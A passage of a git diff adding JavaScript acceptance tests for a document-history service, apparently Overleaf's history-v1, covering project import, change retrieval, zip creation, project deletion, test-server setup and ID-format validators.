+ ] + changes[1].setV2Authors(v2Authors) + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + return_snapshot: 'hashed', + changes: changes.map(changeToRaw), + }) + }) + .then(response => { + expect(response.status).to.equal(HTTPStatus.CREATED) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(1) + expect(snapshot.getFile('test.tex').getHash()).to.equal( + testFiles.STRING_A_HASH + ) + }) + .then(() => { + // Get project history + return pseudoJwtBasicAuthClient.apis.Project.getLatestHistory({ + project_id: testProjectId, + }) + }) + .then(response => { + // it should not fail when some of the authors do not exist anymore + const chunkResponse = ChunkResponse.fromRaw(response.obj) + const changes = chunkResponse.getChunk().getChanges() + expect(changes.length).to.equal(2) + const changeWithAuthor = changes[1] + expect(changeWithAuthor.getV2Authors()).to.deep.equal(v2Authors) + }) + }) + + it('should reject invalid v2 author ids', function () { + const testFilePathname = 'test.tex' + const v2Authors = ['not-a-v2-id'] + + let testProjectId + + return testProjects + .createEmptyProject() + .then(projectId => { + testProjectId = projectId + expect(testProjectId).to.be.a('string') + }) + .then(() => { + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + }) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.addFile(testFilePathname, testFile)), + ] + + changes[0].v2Authors = v2Authors + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Check that invalid changes fail + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + }) + + it('should reject changes with both v1 and v2 author ids', function () { + const testFilePathname = 'test.tex' + const v1Authors = [456] + const v2Authors = ['5a296963ad5e82432674c839', null] + + let testProjectId + + return testProjects + .createEmptyProject() + .then(projectId => { + testProjectId = projectId + expect(testProjectId).to.be.a('string') + }) + .then(() => { + return fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${File.EMPTY_FILE_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('empty.tex')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + }) + .then(response => { + expect(response.ok).to.be.true + }) + .then(() => { + // Import changes + const testFile = File.fromHash(File.EMPTY_FILE_HASH) + const changes = [ + makeChange(Operation.addFile(testFilePathname, testFile)), + ] + + changes[0].authors = v1Authors + changes[0].v2Authors = v2Authors + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: testProjectId, + end_version: 0, + changes: changes.map(changeToRaw), + }) + }) + .then(() => { + // Check that invalid changes fail + expect.fail() + }) + .catch(expectResponse.unprocessableEntity) + }) + + it("returns unprocessable if end_version isn't provided", function () { + return testProjects + .createEmptyProject() + .then(projectId => { + expect(projectId).to.be.a('string') + return 
projectId + }) + .then(projectId => { + // Import changes + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [], + }) + }) + .then(() => { + // Check that invalid changes fail + expect.fail() + }) + .catch(error => { + expect(error.message).to.equal( + 'Required parameter end_version is not provided' + ) + }) + }) + + it('returns unprocessable if return_snapshot is invalid', function () { + return testProjects + .createEmptyProject() + .then(projectId => { + // Import changes + return basicAuthClient.apis.ProjectImport.importChanges1({ + project_id: projectId, + changes: [], + end_version: 0, + return_snapshot: 'not_a_valid_value', + }) + }) + .then(() => { + // Check that invalid changes fail + expect.fail() + }) + .catch(error => { + expect(error.status).to.equal(HTTPStatus.UNPROCESSABLE_ENTITY) + expect(error.response.body.message).to.equal( + 'invalid enum value: return_snapshot' + ) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/projects.test.js b/services/history-v1/test/acceptance/js/api/projects.test.js new file mode 100644 index 0000000..3c333d8 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/projects.test.js @@ -0,0 +1,333 @@ +'use strict' + +const { expect } = require('chai') +const fs = require('node:fs') +const HTTPStatus = require('http-status') +const fetch = require('node-fetch') +const sinon = require('sinon') + +const cleanup = require('../storage/support/cleanup') +const fixtures = require('../storage/support/fixtures') +const testFiles = require('../storage/support/test_files') + +const { zipStore, persistChanges } = require('../../../../storage') + +const { expectHttpError } = require('./support/expect_response') +const testServer = require('./support/test_server') +const { createEmptyProject } = require('./support/test_projects') + +const { + File, + Snapshot, + Change, + AddFileOperation, + EditFileOperation, + TextOperation, +} = require('overleaf-editor-core') +const testProjects = require('./support/test_projects') + +describe('project controller', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + describe('initializeProject', function () { + it('can initialize a new project', async function () { + const projectId = await testProjects.createEmptyProject() + expect(projectId).to.be.a('string') + }) + }) + + describe('createZip', function () { + let importSnapshot + let createZip + + before(function () { + importSnapshot = + testServer.basicAuthClient.apis.ProjectImport.importSnapshot1 + createZip = testServer.basicAuthClient.apis.Project.createZip + }) + + beforeEach(function () { + // Don't start the work in the background in this test --- it is flaky. + sinon.stub(zipStore, 'storeZip').resolves() + }) + afterEach(function () { + zipStore.storeZip.restore() + }) + + it('creates a URL to a zip file', async function () { + // Create a test blob. + const testProjectId = fixtures.docs.uninitializedProject.id + const response = await fetch( + testServer.url( + `/api/projects/${testProjectId}/blobs/${testFiles.HELLO_TXT_HASH}` + ), + { + method: 'PUT', + body: fs.createReadStream(testFiles.path('hello.txt')), + headers: { + Authorization: testServer.basicAuthHeader, + }, + } + ) + expect(response.ok).to.be.true + + // Import a project with the test blob. 
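+ // (The snapshot references the blob by hash only, so the blob must be + // uploaded before a snapshot that uses it can be imported.)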
+ const testFilePathname = 'hello.txt' + const testSnapshot = new Snapshot() + testSnapshot.addFile( + testFilePathname, + File.fromHash(testFiles.HELLO_TXT_HASH) + ) + + const importResponse = await importSnapshot({ + project_id: testProjectId, + snapshot: testSnapshot.toRaw(), + }) + expect(importResponse.obj.projectId).to.equal(testProjectId) + + const createZipResponse = await createZip({ + project_id: testProjectId, + version: 0, + }) + expect(createZipResponse.status).to.equal(HTTPStatus.OK) + const zipInfo = createZipResponse.obj + expect(zipInfo.zipUrl).to.match( + /^http:\/\/gcs:9090\/download\/storage\/v1\/b\/overleaf-test-zips/ + ) + expect(zipStore.storeZip.calledOnce).to.be.true + }) + }) + + // eslint-disable-next-line mocha/no-skipped-tests + describe.skip('getLatestContent', function () { + // TODO: remove this endpoint entirely, see + // https://github.com/overleaf/write_latex/pull/5120#discussion_r244291862 + }) + + describe('project with changes', function () { + let projectId + + beforeEach(async function () { + // used to provide a limit which forces us to persist all of the changes. + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + const limits = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('ab'))], + new Date(), + [] + ), + new Change( + [new AddFileOperation('other.tex', File.fromString('hello'))], + new Date(), + [] + ), + ] + + projectId = await createEmptyProject() + await persistChanges(projectId, changes, limits, 0) + }) + + describe('getLatestHashedContent', function () { + it('returns a snapshot', async function () { + const response = + await testServer.basicAuthClient.apis.Project.getLatestHashedContent({ + project_id: projectId, + }) + expect(response.status).to.equal(HTTPStatus.OK) + const snapshot = Snapshot.fromRaw(response.obj) + expect(snapshot.countFiles()).to.equal(2) + expect(snapshot.getFile('test.tex').getHash()).to.equal( + testFiles.STRING_AB_HASH + ) + }) + }) + + describe('getChanges', function () { + it('returns all changes when not given a limit', async function () { + const response = + await testServer.basicAuthClient.apis.Project.getChanges({ + project_id: projectId, + }) + expect(response.status).to.equal(HTTPStatus.OK) + const changes = response.obj + expect(changes.length).to.equal(2) + const filenames = changes + .flatMap(change => change.operations) + .map(operation => operation.pathname) + expect(filenames).to.deep.equal(['test.tex', 'other.tex']) + }) + + it('returns only requested changes', async function () { + const response = + await testServer.basicAuthClient.apis.Project.getChanges({ + project_id: projectId, + since: 1, + }) + expect(response.status).to.equal(HTTPStatus.OK) + const changes = response.obj + expect(changes.length).to.equal(1) + const filenames = changes + .flatMap(change => change.operations) + .map(operation => operation.pathname) + expect(filenames).to.deep.equal(['other.tex']) + }) + + it('rejects negative versions', async function () { + await expect( + testServer.basicAuthClient.apis.Project.getChanges({ + project_id: projectId, + since: -1, + }) + ).to.be.rejectedWith('Bad Request') + }) + + it('rejects out of bounds versions', async function () { + await expect( + testServer.basicAuthClient.apis.Project.getChanges({ + project_id: projectId, + since: 20, + }) + ).to.be.rejectedWith('Bad Request') + }) + }) + }) + + describe('project with many 
chunks', function () { + let projectId + + beforeEach(async function () { + // used to provide a limit which forces us to persist all of the changes. + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + const limits = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + maxChunkChanges: 5, + } + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString(''))], + new Date(), + [] + ), + ] + + for (let i = 0; i < 20; i++) { + const textOperation = new TextOperation() + textOperation.retain(i) + textOperation.insert('x') + changes.push( + new Change( + [new EditFileOperation('test.tex', textOperation)], + new Date(), + [] + ) + ) + } + + projectId = await createEmptyProject() + await persistChanges(projectId, changes, limits, 0) + }) + + it('returns all changes when not given a limit', async function () { + const response = await testServer.basicAuthClient.apis.Project.getChanges( + { + project_id: projectId, + } + ) + expect(response.status).to.equal(HTTPStatus.OK) + const changes = response.obj + expect(changes.length).to.equal(21) + expect(changes[10].operations[0].textOperation).to.deep.equal([9, 'x']) + }) + + it('returns only requested changes', async function () { + const response = await testServer.basicAuthClient.apis.Project.getChanges( + { + project_id: projectId, + since: 10, + } + ) + expect(response.status).to.equal(HTTPStatus.OK) + const changes = response.obj + expect(changes.length).to.equal(11) + expect(changes[2].operations[0].textOperation).to.deep.equal([11, 'x']) + }) + }) + + describe('getLatestHistoryRaw', function () { + it('should handle reads', async function () { + const projectId = fixtures.docs.initializedProject.id + const response = + await testServer.pseudoJwtBasicAuthClient.apis.Project.getLatestHistoryRaw( + { + project_id: projectId, + readOnly: 'true', + } + ) + expect(response.body).to.deep.equal({ + startVersion: 0, + endVersion: 1, + endTimestamp: '2032-01-01T00:00:00.000Z', + }) + }) + }) + + describe('deleteProject', function () { + it('deletes the project chunks', async function () { + const projectId = fixtures.docs.initializedProject.id + const historyResponse = + await testServer.pseudoJwtBasicAuthClient.apis.Project.getLatestHistory( + { + project_id: projectId, + } + ) + expect(historyResponse.status).to.equal(HTTPStatus.OK) + expect(historyResponse.body).to.have.property('chunk') + const deleteResponse = + await testServer.basicAuthClient.apis.Project.deleteProject({ + project_id: projectId, + }) + expect(deleteResponse.status).to.equal(HTTPStatus.NO_CONTENT) + await expectHttpError( + testServer.pseudoJwtBasicAuthClient.apis.Project.getLatestHistory({ + project_id: projectId, + }), + HTTPStatus.NOT_FOUND + ) + }) + + it('deletes the project blobs', async function () { + const projectId = fixtures.docs.initializedProject.id + const token = testServer.createTokenForProject(projectId) + const authHeaders = { Authorization: `Bearer ${token}` } + const hash = testFiles.HELLO_TXT_HASH + const fileContents = await fs.promises.readFile( + testFiles.path('hello.txt') + ) + const blobUrl = testServer.url(`/api/projects/${projectId}/blobs/${hash}`) + const response1 = await fetch(blobUrl, { + method: 'PUT', + headers: authHeaders, + body: fileContents, + }) + expect(response1.ok).to.be.true + const response2 = await fetch(blobUrl, { headers: authHeaders }) + const payload = await response2.text() + expect(payload).to.equal(fileContents.toString()) + const deleteResponse 
= + await testServer.basicAuthClient.apis.Project.deleteProject({ + project_id: projectId, + }) + expect(deleteResponse.status).to.equal(HTTPStatus.NO_CONTENT) + const response3 = await fetch(blobUrl, { headers: authHeaders }) + expect(response3.status).to.equal(HTTPStatus.NOT_FOUND) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/api/support/expect_response.js b/services/history-v1/test/acceptance/js/api/support/expect_response.js new file mode 100644 index 0000000..cdab3d3 --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/expect_response.js @@ -0,0 +1,53 @@ +'use strict' + +const { expect } = require('chai') +const HTTPStatus = require('http-status') + +function expectStatus(err, expected) { + const httpStatus = err.status || err.statusCode + if (httpStatus === undefined) { + throw err + } else { + expect(httpStatus).to.equal(expected) + } +} + +async function expectHttpError(promise, expectedStatusCode) { + try { + await promise + } catch (err) { + const statusCode = err.status || err.statusCode + if (statusCode === undefined) { + throw err + } else { + expect(statusCode).to.equal(expectedStatusCode) + return + } + } + expect.fail('expected HTTP request to return with an error response') +} + +exports.expectHttpError = expectHttpError +exports.notFound = function (err) { + expectStatus(err, HTTPStatus.NOT_FOUND) +} + +exports.unprocessableEntity = function (err) { + expectStatus(err, HTTPStatus.UNPROCESSABLE_ENTITY) +} + +exports.conflict = function (err) { + expectStatus(err, HTTPStatus.CONFLICT) +} + +exports.unauthorized = function (err) { + expectStatus(err, HTTPStatus.UNAUTHORIZED) +} + +exports.forbidden = function (err) { + expectStatus(err, HTTPStatus.FORBIDDEN) +} + +exports.requestEntityTooLarge = function (err) { + expectStatus(err, HTTPStatus.REQUEST_ENTITY_TOO_LARGE) +} diff --git a/services/history-v1/test/acceptance/js/api/support/test_backup_deletion_server.mjs b/services/history-v1/test/acceptance/js/api/support/test_backup_deletion_server.mjs new file mode 100644 index 0000000..335eb0b --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/test_backup_deletion_server.mjs @@ -0,0 +1,51 @@ +// @ts-check +import config from 'config' +import { startApp } from '../../../../../backup-deletion-app.mjs' + +/** @type {import("http").Server} */ +let server + +/** + * @param {string} pathname + * @return {string} + */ +function testUrl(pathname) { + const url = new URL('http://127.0.0.1') + const addr = server.address() + if (addr && typeof addr === 'object') { + url.port = addr.port.toString() + } + url.pathname = pathname + return url.toString() +} + +const basicAuthHeader = + 'Basic ' + + Buffer.from(`staging:${config.get('basicHttpAuth.password')}`).toString( + 'base64' + ) + +async function listenOnRandomPort() { + if (server) return // already running + for (let i = 0; i < 10; i++) { + try { + server = await startApp(0) + return + } catch {} + } + server = await startApp(0) +} + +after('close server', function (done) { + if (server) { + server.close(done) + } else { + done() + } +}) + +export default { + testUrl, + basicAuthHeader, + listenOnRandomPort, +} diff --git a/services/history-v1/test/acceptance/js/api/support/test_backup_verifier_server.mjs b/services/history-v1/test/acceptance/js/api/support/test_backup_verifier_server.mjs new file mode 100644 index 0000000..57a805e --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/test_backup_verifier_server.mjs @@ -0,0 +1,43 @@ +// @ts-check +import { 
startApp } from '../../../../../backup-verifier-app.mjs' + + /** @type {import("http").Server} */ + let server + + /** + * @param {string} pathname + * @return {string} + */ + function testUrl(pathname) { + const url = new URL('http://127.0.0.1') + const addr = server.address() + if (addr && typeof addr === 'object') { + url.port = addr.port.toString() + } + url.pathname = pathname + return url.toString() + } + + async function listenOnRandomPort() { + if (server) return // already running + for (let i = 0; i < 10; i++) { + try { + server = await startApp(0) + return + } catch {} + } + server = await startApp(0, false) + } + + after('close server', function (done) { + if (server) { + server.close(done) + } else { + done() + } + }) + + export default { + testUrl, + listenOnRandomPort, + } diff --git a/services/history-v1/test/acceptance/js/api/support/test_projects.js b/services/history-v1/test/acceptance/js/api/support/test_projects.js new file mode 100644 index 0000000..df4d83e --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/test_projects.js @@ -0,0 +1,26 @@ +const BPromise = require('bluebird') +const { expect } = require('chai') +const HTTPStatus = require('http-status') +const assert = require('../../../../../storage/lib/assert') + +const testServer = require('./test_server') + +/** + * Without a provided history id, a new one will get generated. + * The history id could either be a mongo id, or a postgres id. + * + * @param {string} [existingHistoryId] + * @return {Promise<string>} + */ +exports.createEmptyProject = function (existingHistoryId) { + return BPromise.resolve( + testServer.basicAuthClient.apis.Project.initializeProject({ + body: { projectId: existingHistoryId }, + }) + ).then(response => { + expect(response.status).to.equal(HTTPStatus.OK) + const { projectId } = response.obj + assert.projectId(projectId, 'bad projectId') + return projectId + }) +} diff --git a/services/history-v1/test/acceptance/js/api/support/test_server.js b/services/history-v1/test/acceptance/js/api/support/test_server.js new file mode 100644 index 0000000..ac6550b --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/test_server.js @@ -0,0 +1,133 @@ +/** + * @file + * Create a test server. For performance reasons, there is only one test server, + * and it is shared between all of the tests. + * + * This uses mocha's "root-level hooks" to start and clean up the server. + */ + +const BPromise = require('bluebird') +const config = require('config') +const http = require('node:http') +const jwt = require('jsonwebtoken') + +const Swagger = require('swagger-client') + +const app = require('../../../../../app') + +function testUrl(pathname, opts = {}) { + const url = new URL('http://127.0.0.1') + url.port = exports.server.address().port + url.pathname = pathname + if (opts.qs) { + url.search = new URLSearchParams(opts.qs).toString() + } + return url.toString() + } + + exports.url = testUrl + + function createClient(options) { + // The Swagger client returns native Promises; we use Bluebird promises. Just + // wrapping the client creation is enough in many (but not all) cases to + // get Bluebird into the chain. 
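+ // (new Swagger(...) returns a thenable that resolves to the ready client + // once the /api-docs spec has been fetched.)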
+ return BPromise.resolve(new Swagger(testUrl('/api-docs'), options)) +} + +function createTokenForProject(projectId, opts = {}) { + const jwtKey = opts.jwtKey || config.get('jwtAuth.key') + const jwtAlgorithm = config.get('jwtAuth.algorithm') + return jwt.sign({ project_id: projectId }, jwtKey, { + algorithm: jwtAlgorithm, + }) +} + +exports.createTokenForProject = createTokenForProject + +function createClientForProject(projectId, opts = {}) { + const token = createTokenForProject(projectId, opts) + return createClient({ authorizations: { jwt: `Bearer ${token}` } }) +} + +exports.createClientForProject = createClientForProject + +function createClientForDownloadZip(projectId) { + const token = createTokenForProject(projectId) + return createClient({ authorizations: { token } }) +} + +exports.createClientForDownloadZip = createClientForDownloadZip + +function createBasicAuthClient() { + return createClient({ + authorizations: { + basic: { + username: 'staging', + password: config.get('basicHttpAuth.password'), + }, + }, + }) +} + +function createPseudoJwtBasicAuthClient() { + // HACK: The history service will accept HTTP basic auth for any endpoint that + // is expecting a JWT. If / when we fix that, we will need to fix this. + const jwt = + 'Basic ' + + Buffer.from(`staging:${config.get('basicHttpAuth.password')}`).toString( + 'base64' + ) + return createClient({ authorizations: { jwt } }) +} + +exports.basicAuthHeader = + 'Basic ' + + Buffer.from(`staging:${config.get('basicHttpAuth.password')}`).toString( + 'base64' + ) + +function createServer() { + const server = http.createServer(app) + return app.setup().then(() => { + exports.server = server + return server + }) +} + +function createDefaultUnauthenticatedClient() { + return createClient().then(client => { + exports.client = client + }) +} + +function createDefaultBasicAuthClient() { + return createBasicAuthClient().then(client => { + exports.basicAuthClient = client + }) +} + +function createDefaultPseudoJwtBasicAuthClient() { + return createPseudoJwtBasicAuthClient().then(client => { + exports.pseudoJwtBasicAuthClient = client + }) +} + +before(function () { + function listenOnRandomPort(server) { + const listen = BPromise.promisify(server.listen, { context: server }) + return listen(0).catch(err => { + if (err.code !== 'EADDRINUSE' && err.code !== 'EACCES') throw err + return listenOnRandomPort(server) + }) + } + + return createServer() + .then(listenOnRandomPort) + .then(createDefaultUnauthenticatedClient) + .then(createDefaultBasicAuthClient) + .then(createDefaultPseudoJwtBasicAuthClient) +}) + +after(function () { + exports.server.close() +}) diff --git a/services/history-v1/test/acceptance/js/storage/assert.test.js b/services/history-v1/test/acceptance/js/storage/assert.test.js new file mode 100644 index 0000000..6ba30e2 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/assert.test.js @@ -0,0 +1,248 @@ +'use strict' + +const OError = require('@overleaf/o-error') +const { expect } = require('chai') +const assert = require('../../../../storage/lib/assert') + +describe('assert', function () { + describe('blobHash', function () { + it('should not throw for valid blob hashes', function () { + expect(() => + assert.blobHash( + 'aad321caf77ca6c5ab09e6c638c237705f93b001', + 'should be a blob hash' + ) + ).to.not.throw() + }) + + it('should throw for invalid blob hashes', function () { + try { + assert.blobHash('invalid-hash', 'should be a blob hash') + expect.fail() + } catch (error) { + 
expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a blob hash') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-hash' }) + } + }) + + it('should throw for string integer blob hashes', function () { + try { + assert.blobHash('123', 'should be a blob hash') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a blob hash') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '123' }) + } + }) + }) + + describe('projectId', function () { + it('should not throw for valid mongo project ids', function () { + expect(() => + assert.projectId('507f1f77bcf86cd799439011', 'should be a project id') + ).to.not.throw() + }) + + it('should not throw for valid postgres project ids', function () { + expect(() => + assert.projectId('123456789', 'should be a project id') + ).to.not.throw() + }) + + it('should throw for invalid project ids', function () { + try { + assert.projectId('invalid-id', 'should be a project id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a project id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-id' }) + } + }) + + it('should throw for non-numeric project ids', function () { + try { + assert.projectId('12345x', 'should be a project id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a project id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '12345x' }) + } + }) + + it('should throw for postgres ids starting with 0', function () { + try { + assert.projectId('0123456', 'should be a project id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a project id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '0123456' }) + } + }) + }) + + describe('chunkId', function () { + it('should not throw for valid mongo chunk ids', function () { + expect(() => + assert.chunkId('507f1f77bcf86cd799439011', 'should be a chunk id') + ).to.not.throw() + }) + + it('should not throw for valid postgres chunk ids', function () { + expect(() => + assert.chunkId('123456789', 'should be a chunk id') + ).to.not.throw() + }) + + it('should throw for invalid chunk ids', function () { + try { + assert.chunkId('invalid-id', 'should be a chunk id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a chunk id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-id' }) + } + }) + + it('should throw for integer chunk ids', function () { + try { + assert.chunkId(12345, 'should be a chunk id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a chunk id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 12345 }) + } + }) + }) + + describe('mongoId', function () { + it('should not throw for valid mongo ids', function () { + expect(() => + assert.mongoId('507f1f77bcf86cd799439011', 'should be a mongo id') + ).to.not.throw() + }) + + it('should throw for invalid mongo ids', function () { + try { + assert.mongoId('invalid-id', 'should be a mongo id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a mongo id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-id' }) + } 
+ }) + + it('should throw for numeric mongo ids', function () { + try { + assert.mongoId('12345', 'should be a mongo id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a mongo id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '12345' }) + } + }) + + it('should throw for mongo ids that are too short', function () { + try { + assert.mongoId('507f1f77bcf86cd79943901', 'should be a mongo id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a mongo id') + expect(OError.getFullInfo(error)).to.deep.equal({ + arg: '507f1f77bcf86cd79943901', + }) + } + }) + + it('should throw for mongo ids that are too long', function () { + try { + assert.mongoId('507f1f77bcf86cd7994390111', 'should be a mongo id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a mongo id') + expect(OError.getFullInfo(error)).to.deep.equal({ + arg: '507f1f77bcf86cd7994390111', + }) + } + }) + }) + + describe('postgresId', function () { + it('should not throw for valid postgres ids', function () { + expect(() => + assert.postgresId('123456789', 'should be a postgres id') + ).to.not.throw() + expect(() => + assert.postgresId('1', 'should be a postgres id') + ).to.not.throw() + }) + + it('should throw for invalid postgres ids', function () { + try { + assert.postgresId('invalid-id', 'should be a postgres id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a postgres id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-id' }) + } + }) + + it('should throw for postgres ids starting with 0', function () { + try { + assert.postgresId('0123456', 'should be a postgres id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a postgres id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '0123456' }) + } + }) + + it('should throw for postgres ids that are too long', function () { + try { + assert.postgresId('12345678901', 'should be a postgres id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a postgres id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '12345678901' }) + } + }) + }) + + describe('regex constants', function () { + it('MONGO_ID_REGEXP should match valid mongo ids', function () { + expect('507f1f77bcf86cd799439011').to.match(assert.MONGO_ID_REGEXP) + expect('abcdef0123456789abcdef01').to.match(assert.MONGO_ID_REGEXP) + }) + + it('MONGO_ID_REGEXP should not match invalid mongo ids', function () { + expect('invalid-id').to.not.match(assert.MONGO_ID_REGEXP) + expect('507f1f77bcf86cd79943901').to.not.match(assert.MONGO_ID_REGEXP) // too short + expect('507f1f77bcf86cd7994390111').to.not.match(assert.MONGO_ID_REGEXP) // too long + expect('507F1F77BCF86CD799439011').to.not.match(assert.MONGO_ID_REGEXP) // uppercase + }) + + it('POSTGRES_ID_REGEXP should match valid postgres ids', function () { + expect('123456789').to.match(assert.POSTGRES_ID_REGEXP) + expect('1').to.match(assert.POSTGRES_ID_REGEXP) + }) + + it('POSTGRES_ID_REGEXP should not match invalid postgres ids', function () { + expect('invalid-id').to.not.match(assert.POSTGRES_ID_REGEXP) + expect('0123456').to.not.match(assert.POSTGRES_ID_REGEXP) // starts with 0 + 
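+      // Taken together, these cases suggest a pattern along the lines of
+      // /^[1-9][0-9]{0,9}$/ (an inference from the fixtures here, not a
+      // quote of the actual POSTGRES_ID_REGEXP source).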
expect('12345678901').to.not.match(assert.POSTGRES_ID_REGEXP) // too long (> 10 digits) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/back_fill_file_hash.test.mjs b/services/history-v1/test/acceptance/js/storage/back_fill_file_hash.test.mjs new file mode 100644 index 0000000..fad87b4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/back_fill_file_hash.test.mjs @@ -0,0 +1,1548 @@ +import fs from 'node:fs' +import Crypto from 'node:crypto' +import Stream from 'node:stream' +import { setTimeout } from 'node:timers/promises' +import { promisify } from 'node:util' +import { ObjectId, Binary } from 'mongodb' +import { + db, + backedUpBlobs, + globalBlobs, +} from '../../../../storage/lib/mongodb.js' +import cleanup from './support/cleanup.js' +import testProjects from '../api/support/test_projects.js' +import { execFile } from 'node:child_process' +import chai, { expect } from 'chai' +import chaiExclude from 'chai-exclude' +import config from 'config' +import ObjectPersistor from '@overleaf/object-persistor' +import { WritableBuffer } from '@overleaf/stream-utils' +import { + backupPersistor, + projectBlobsBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import projectKey from '../../../../storage/lib/project_key.js' +import { + BlobStore, + makeProjectKey, +} from '../../../../storage/lib/blob_store/index.js' + +chai.use(chaiExclude) +const TIMEOUT = 20 * 1_000 + +const { deksBucket } = config.get('backupStore') +const { tieringStorageClass } = config.get('backupPersistor') + +const projectsCollection = db.collection('projects') +const deletedProjectsCollection = db.collection('deletedProjects') +const deletedFilesCollection = db.collection('deletedFiles') + +const FILESTORE_PERSISTOR = ObjectPersistor({ + backend: 'gcs', + gcs: { + endpoint: { + apiEndpoint: process.env.GCS_API_ENDPOINT, + projectId: process.env.GCS_PROJECT_ID, + }, + }, +}) + +/** + * @param {ObjectId} objectId + * @return {string} + */ +function gitBlobHash(objectId) { + return gitBlobHashBuffer(Buffer.from(objectId.toString())) +} + +/** + * @param {Buffer} buf + * @return {string} + */ +function gitBlobHashBuffer(buf) { + const sha = Crypto.createHash('sha1') + sha.update(`blob ${buf.byteLength}\x00`) + sha.update(buf) + return sha.digest('hex') +} + +/** + * @param {string} gitBlobHash + * @return {Binary} + */ +function binaryForGitBlobHash(gitBlobHash) { + return new Binary(Buffer.from(gitBlobHash, 'hex')) +} + +async function listS3Bucket(bucket, wantStorageClass) { + const client = backupPersistor._getClientForBucket(bucket) + const response = await client.listObjectsV2({ Bucket: bucket }).promise() + + for (const object of response.Contents || []) { + expect(object).to.have.property('StorageClass', wantStorageClass) + } + + return (response.Contents || []).map(item => item.Key || '') +} + +function objectIdFromTime(timestamp) { + return ObjectId.createFromTime(new Date(timestamp).getTime() / 1000) +} + +const PRINT_IDS_AND_HASHES_FOR_DEBUGGING = false + +describe('back_fill_file_hash script', function () { + this.timeout(TIMEOUT) + const USER_FILES_BUCKET_NAME = 'fake-user-files-gcs' + + const projectId0 = objectIdFromTime('2017-01-01T00:00:00Z') + const projectId1 = objectIdFromTime('2017-01-01T00:01:00Z') + const projectId2 = objectIdFromTime('2017-01-01T00:02:00Z') + const projectId3 = objectIdFromTime('2024-01-01T00:03:00Z') + const projectIdDeleted0 = objectIdFromTime('2017-01-01T00:04:00Z') + const projectIdDeleted1 = 
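+  // ObjectId.createFromTime (wrapped by objectIdFromTime above) embeds the
+  // unix timestamp in the id's leading four bytes and zeroes the rest, so
+  // these fixture ids are deterministic and sort chronologically.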
objectIdFromTime('2024-01-01T00:05:00Z')
